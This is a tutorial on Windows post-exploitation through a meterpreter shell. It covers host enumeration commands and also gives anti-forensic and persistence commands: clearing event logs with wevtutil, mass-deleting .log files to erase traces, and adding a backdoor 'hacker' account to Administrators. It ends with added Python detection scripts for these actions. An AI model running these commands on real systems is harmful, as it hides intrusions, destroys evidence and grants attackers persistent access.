This article is about post exploitation on the victim's system using the Windows command line. When an attacker gains a meterpreter session on a remote PC, he/she can enumerate a huge amount of information and make effective changes using knowledge of the Windows command line.
Requirement
Attacker: Kali Linux
Target: Windows PC
To execute this, we will first get a meterpreter session on the remote PC, which you can learn from here. After gaining the session, escalate its privileges to Administrator, which you can learn from here.
Now, to access the Windows command line, type 'shell' in the meterpreter shell.
Let’s Start!!
Get User Details and Privileges
After gaining the meterpreter shell or Windows command line, and before doing any other work, it is important to know the current user. This command is usually used to verify that the account we were trying to access is the one we got. This can be simply done using the command whoami.
To increase our reach, we will use an option of the whoami command:
[/all]: to show all the details about the user.
Example: whoami /all
As seen below, we have the username, SID and local group details. We also get details about the privileges that are enabled or disabled for the user we are currently logged on as.
Get the System Info
This command helps us enumerate lots of information regarding the system, like hostname, domain, time zone and much more.
Example: systeminfo
We can filter the basic system details (Manufacturer, Build and Model) of the victim's system using findstr.
Example: systeminfo | findstr System
As shown in the below screenshot, we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the victim's system.
We can get the location (as close as the country) of the victim's system using systeminfo. Here we are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Time
As shown in the below screenshot, we have the Time Zone (UTC+05:30), so we can say that the victim's system is in India.
Get Memory Details (Physical, Virtual, In Use, Free)
We can get the basic memory details of the victim's system using systeminfo. Here we are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Memory
As shown in the below screenshot, we have a Total Physical Memory of 3.5 GB, of which 1.6 GB is available; we also get the virtual memory details.
List System Drivers
We can display a list of all installed device drivers on the victim's system and their properties with the driverquery command.
Example: driverquery
We can get the list of kernel drivers on the victim's system using driverquery. Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery | findstr Kernel
As seen below, we have obtained a list of kernel drivers, which can be used to get direct exploits against the victim's system.
List File System Drivers
We can get the list of file system drivers on the victim's system using driverquery. Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery | findstr "File System"
Display Info about a Particular Service
We can obtain information about a particular service using the sc command. Here we are using the following option with the sc command:
[query] to query the information of a service.
Syntax: sc query [service name]
Example: sc query wuauserv
We can obtain information about running tasks using the tasklist command. This command shows the name of each running task along with its Process ID (PID), Session Name, Session Number and Memory Usage.
Syntax: tasklist
[/m]: to specify the modules in tasklist. We will have to mention the module by which the tasklist is to be filtered.
Syntax: tasklist /m [Module Name]
Example: tasklist /m ntdll.dll
Here we can see all the tasks linked with the ntdll.dll module.
Killing Tasks
We can kill tasks on the victim's system using a command called taskkill. Taskkill requires either one of two things:
1. Process ID
2. Task Name
Here we are going to use the [/f] option in taskkill, which enables taskkill to forcefully kill the tasks.
Killing the Tasks using the Process ID
Syntax: taskkill /f /pid [Process ID of Task]
Example: taskkill /f /pid 7236
Killing the Tasks using the Task Name
Syntax: taskkill /f /im "[Task Name]"
Example: taskkill /f /im "Taskmgr.exe"
Starting or Stopping Services
We can start a service or some backdoor without the knowledge of the victim using the sc command. Here we are using the following option with the sc command:
[start] to start a service.
Syntax: sc start [Service Name]
Example: sc start TeamViewer
As you can see in the below image, the service has started.
We can also stop a service using the sc command. Here we are using the following option with the sc command:
[stop] to stop a service.
Syntax: sc stop [Service Name]
Example: sc stop TeamViewer
As you can see in the below image, the service has stopped.
List all the Logs on the System
We can obtain a list of all the logs on a system using the wevtutil command. Here we are using the following option with the wevtutil command:
[el] to list log names.
Example: wevtutil el
Clear a Specific Log on the System
We can clear a specific log on a system using the wevtutil command. Here we are using the following option with the wevtutil command:
[cl] to clear a log.
Syntax: wevtutil cl [log name]
Example: wevtutil cl System
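From the defender's side, the clear itself leaves a record: Security event 1102 or System event 104, which survives only if events are forwarded off the host before the log is wiped. As an added example, not code from the original article, the following script checks forwarded records for those events and for a process-creation command line that invokes wevtutil cl; the sample events are constructed.

```python
"""Flag event-log clearing from forwarded Windows events; added example, not from the original article."""
import re

# Real event IDs: Security 1102 is written when the Security log is cleared and
# System 104 when any other log is cleared. Both survive "wevtutil cl" only on a
# collector that already received them, which is why a collector checks for them.
CLEAR_RECORDS = {("Security", 1102), ("System", 104)}
# Process-creation records that carry a command line (Security 4688, Sysmon 1).
PROCESS_RECORDS = {("Security", 4688), ("Microsoft-Windows-Sysmon/Operational", 1)}
WEVTUTIL_CLEAR = re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(\S+)", re.IGNORECASE)


def log_clear_alerts(events):
    """Return one alert per event that records, or requests, a log clear.
    Events are dicts with channel, event_id, host, user and optional fields."""
    alerts = []
    for ev in events:
        key = (ev["channel"], ev["event_id"])
        if key in CLEAR_RECORDS:
            # 1102 always refers to the Security log; 104 names the cleared log in its body.
            log = ev.get("cleared_log") or ("Security" if ev["event_id"] == 1102 else "unknown")
            alerts.append({"host": ev["host"], "user": ev["user"], "log": log,
                           "signal": "clear record %d" % ev["event_id"]})
        elif key in PROCESS_RECORDS:
            match = WEVTUTIL_CLEAR.search(ev.get("command_line", ""))
            if match:
                alerts.append({"host": ev["host"], "user": ev["user"],
                               "log": match.group(1), "signal": "command line"})
    return alerts


# Constructed sample: a "wevtutil cl System" run, the System 104 it produces, a
# Security 1102, and two benign records (a logon and a "wevtutil el" listing).
SAMPLE_EVENTS = [
    {"channel": "Security", "event_id": 4624, "host": "WS01", "user": "alice"},
    {"channel": "Security", "event_id": 4688, "host": "WS01", "user": "SYSTEM",
     "command_line": "wevtutil el"},
    {"channel": "Security", "event_id": 4688, "host": "WS01", "user": "SYSTEM",
     "command_line": "wevtutil  cl System"},
    {"channel": "System", "event_id": 104, "host": "WS01", "user": "SYSTEM",
     "cleared_log": "System"},
    {"channel": "Security", "event_id": 1102, "host": "WS01", "user": "SYSTEM"},
]

if __name__ == "__main__":
    for alert in log_clear_alerts(SAMPLE_EVENTS):
        print(alert)
```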
Find all the Hard Disk/Storage Partitions on a System
While penetration testing a remote PC, knowledge of all the hard disk or storage devices and partitions is essential so that we can sweep all the partitions and storage devices in the hope of finding data of particular importance.
This can be done using the fsutil command. Here we are using the following options with the fsutil command:
[fsinfo] to view file system info.
[drives] to list all drives.
Example: fsutil fsinfo drives
As you can see below, the victim system has 4 hard disk partitions: C, D, E and F.
Delete all Logs on a System
While penetration testing a remote PC, it is essential to remove the trace of your activities, so we need to remove the evidence of our presence, which can be found in log files.
Every log file has a .log extension, so we are going to sweep the system directory for files with the extension .log and delete them with the del command.
Note: Use this command with the path set to the system directory (in my case it is C:\).
Here we are using the following options with the del command:
[/a] to select files based on attributes.
[/s] to select System Files (/s is an attribute, so it is to be used after /a).
[/q] to use Quiet Mode (it doesn't ask whether it is OK to delete on global wildcards).
[/f] to force delete read-only files.
Syntax: del [Directory]\*.log /a /s /q /f
Example: del \*.log /a /s /q /f
As you can see in the below screenshot, the process of detecting and deleting the files with the .log extension has started.
While penetration testing a remote PC, it is important to obtain the list of local users so that the attacker can gain information about the various users assigned to that particular system.
This can be done using the net command. Here we are using the following option with the net command:
[user] to display the list of local users
Example: net user
It is always advantageous to add a user to the local groups so that the attacker can perform certain tasks on that system.
This can be done using the net command. Here we are using the following syntax with the net command:
Syntax: net user [logon_name] [password] /add
Example: net user hacker pass123 /add
Many times, we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the Administrators local group.
Here we are using the following option with the net command:
[localgroup] to select the local group
Syntax: net localgroup administrators [logon_name] /add
Example: net localgroup administrators hacker /add
In the above example, I have added a user named hacker to the local administrators group. We can verify this using the "net user" command.
Now, during the clean-up process, it is important to delete the local user created.
This can be done using the net command. Here we are using the following syntax with the net command:
Syntax: net user [logon_name] /del
Example: net user hacker /del
Here you can see that I have used the net command to add a user, make it a member of the administrators local group and then delete that user.
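Detection logic for the account sequence above (net user ... /add followed by net localgroup administrators ... /add), as an added example that is not part of the original article: it joins the Windows Security events 4720 and 4732 on the account SID and alerts when the two fall inside a short window. The event IDs and the Administrators SID are real; the sample records, names, SIDs and times are constructed.

```python
"""Correlate local account creation with Administrators membership; added example, not from the original article."""
from datetime import datetime, timedelta

# Real Security event IDs: 4720 = user account created, 4732 = member added to a
# security-enabled local group. S-1-5-32-544 is the well-known SID of the built-in
# Administrators group. 4732 names the member by SID, so the join key is the SID
# that 4720 reports for the new account.
ADMINISTRATORS_SID = "S-1-5-32-544"
WINDOW = timedelta(minutes=10)


def new_admin_alerts(events, window=WINDOW):
    """Return one alert per account created and then added to Administrators
    within `window`. Events are dicts; input order does not matter."""
    created = {}  # account SID -> (creation time, account name, creating principal)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] == 4720:
            created[ev["target_sid"]] = (ev["time"], ev["target"], ev["subject"])
        elif ev["event_id"] == 4732 and ev["group_sid"] == ADMINISTRATORS_SID:
            hit = created.get(ev["member_sid"])
            if hit and ev["time"] - hit[0] <= window:
                alerts.append({"account": hit[1], "created_by": hit[2], "added_by": ev["subject"],
                               "seconds_between": int((ev["time"] - hit[0]).total_seconds())})
    return alerts


def _t(stamp):
    return datetime.fromisoformat(stamp)


# Constructed sample: the article's "net user hacker pass123 /add" followed by
# "net localgroup administrators hacker /add", plus a service account that is
# created, put in Remote Desktop Users (S-1-5-32-555) and only made an
# administrator a day later. SIDs, names and times are made up.
SAMPLE_EVENTS = [
    {"time": _t("2024-03-01T10:00:00"), "event_id": 4720, "subject": "admin",
     "target": "svc-backup", "target_sid": "S-1-5-21-1-2-3-1001"},
    {"time": _t("2024-03-01T10:02:10"), "event_id": 4720, "subject": "SYSTEM",
     "target": "hacker", "target_sid": "S-1-5-21-1-2-3-1002"},
    {"time": _t("2024-03-01T10:02:15"), "event_id": 4732, "subject": "SYSTEM",
     "member_sid": "S-1-5-21-1-2-3-1002", "group_sid": ADMINISTRATORS_SID},
    {"time": _t("2024-03-01T10:05:00"), "event_id": 4732, "subject": "admin",
     "member_sid": "S-1-5-21-1-2-3-1001", "group_sid": "S-1-5-32-555"},
    {"time": _t("2024-03-02T09:00:00"), "event_id": 4732, "subject": "admin",
     "member_sid": "S-1-5-21-1-2-3-1001", "group_sid": ADMINISTRATORS_SID},
]

if __name__ == "__main__":
    for alert in new_admin_alerts(SAMPLE_EVENTS):
        print(alert)
```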
Display the List of all Scheduled Tasks
While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attack accordingly to further penetrate the victim's system. This can be done using schtasks.
Here we are using the following options with the schtasks command:
[/query] to display all scheduled tasks
[/fo] to specify the format of the output (in this case we use LIST)
[/v] to use verbose mode
Example: schtasks /query /fo LIST /v
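The enumeration commands used throughout this article (whoami, systeminfo, driverquery, tasklist, sc query, fsutil fsinfo drives, net user, wevtutil el and schtasks /query) rarely all run from one account inside a few minutes during normal use. As an added example that is not part of the original article, this script classifies process-creation command lines against that list and alerts when one principal triggers several distinct categories within a short window; the sample records are constructed.

```python
"""Flag a burst of host-discovery commands by one principal; added example, not from the original article."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One pattern per enumeration command in the article, matched against 4688/Sysmon 1 command lines.
PATTERNS = {name: re.compile(rx, re.IGNORECASE) for name, rx in {
    "account":   r"\bwhoami(?:\.exe)?\b",
    "system":    r"\bsysteminfo(?:\.exe)?\b",
    "drivers":   r"\bdriverquery(?:\.exe)?\b",
    "processes": r"\btasklist(?:\.exe)?\b",
    "services":  r"\bsc(?:\.exe)?\s+query\b",
    "drives":    r"\bfsutil(?:\.exe)?\s+fsinfo\s+drives\b",
    "users":     r"\bnet1?(?:\.exe)?\s+user\s*$",  # a bare "net user" lists accounts
    "logs":      r"\bwevtutil(?:\.exe)?\s+el\b",
    "tasks":     r"\bschtasks(?:\.exe)?\s+/query\b",
}.items()}
WINDOW = timedelta(minutes=5)


def classify(command_line):
    """Return the discovery category of a command line, or None."""
    return next((name for name, rx in PATTERNS.items() if rx.search(command_line)), None)


def discovery_bursts(events, threshold=4, window=WINDOW):
    """Alert once per (host, user) running >= threshold distinct categories inside window.
    Events are dicts with an ISO-8601 time, host, user and command_line."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        category = classify(ev.get("command_line", ""))
        if category:
            hits[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["time"]), category))
    alerts = []
    for (host, user), seq in hits.items():
        for i, (start, _) in enumerate(seq):
            categories = {c for t, c in seq[i:] if t - start <= window}
            if len(categories) >= threshold:
                alerts.append({"host": host, "user": user, "first_seen": start.isoformat(),
                               "categories": sorted(categories)})
                break  # one alert per principal per run is enough
    return alerts


# Constructed sample: SYSTEM walks the article's sequence in three minutes; alice stays below the threshold.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T10:00:00", "host": "WS01", "user": "SYSTEM", "command_line": "whoami /all"},
    {"time": "2024-03-01T10:00:20", "host": "WS01", "user": "SYSTEM", "command_line": "systeminfo"},
    {"time": "2024-03-01T10:01:00", "host": "WS01", "user": "SYSTEM", "command_line": "driverquery"},
    {"time": "2024-03-01T10:01:30", "host": "WS01", "user": "alice", "command_line": "whoami"},
    {"time": "2024-03-01T10:02:00", "host": "WS01", "user": "SYSTEM", "command_line": "tasklist /m ntdll.dll"},
    {"time": "2024-03-01T10:03:00", "host": "WS01", "user": "SYSTEM", "command_line": "schtasks /query /fo LIST /v"},
]
```

Tune `threshold` and `WINDOW` against a baseline of administrator activity in your own environment before alerting on it.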